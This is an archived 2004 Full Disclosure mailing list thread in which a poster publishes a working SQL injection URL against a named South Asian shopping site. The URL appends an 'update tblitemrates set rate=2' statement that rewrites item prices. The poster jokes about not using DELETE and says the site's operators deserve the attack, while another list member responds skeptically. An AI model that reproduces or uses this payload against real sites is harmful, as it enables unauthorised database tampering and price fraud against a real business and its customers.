Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

fulldisclosure logo Full Disclosure mailing list archives

Re[2]: MUNCHAHOUSE more xploits
From: 01security <npguy () ysgnet com>
Date: Wed, 14 Jan 2004 16:18:54 +0545
Hello Jelmer,

seems the site down. i donno why ASP
guys are still unaware of such vuln.

muncha.com  pepole deserve this for their ignorance
and pathetic ego showing off.



Wednesday, January 14, 2004, 3:54:01 PM, you wrote:


Following example demonstrates how sql queries can be
injected in your web site.



Other exploitation has been avoided due to security
concern.


JK> Riiiiight...


JK> On Wed, 2004-01-14 at 09:21, 01security wrote:

check this ... how rate can be changed easily in one of the popular
shopping site of south-asia regiona...
(don't use DELETE right...let everyone enjoy this)...

http://www.muncha.com/item.asp?catid=&itemid=638;update%20tblitemrates%20set%20rate=2

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html






-- 
Best regards,
 01security                            mailto:npguy () ysgnet com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
  • MUNCHAHOUSE more xploits 01security (Jan 14)
    • Message not available
      • Re[2]: MUNCHAHOUSE more xploits 01security (Jan 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]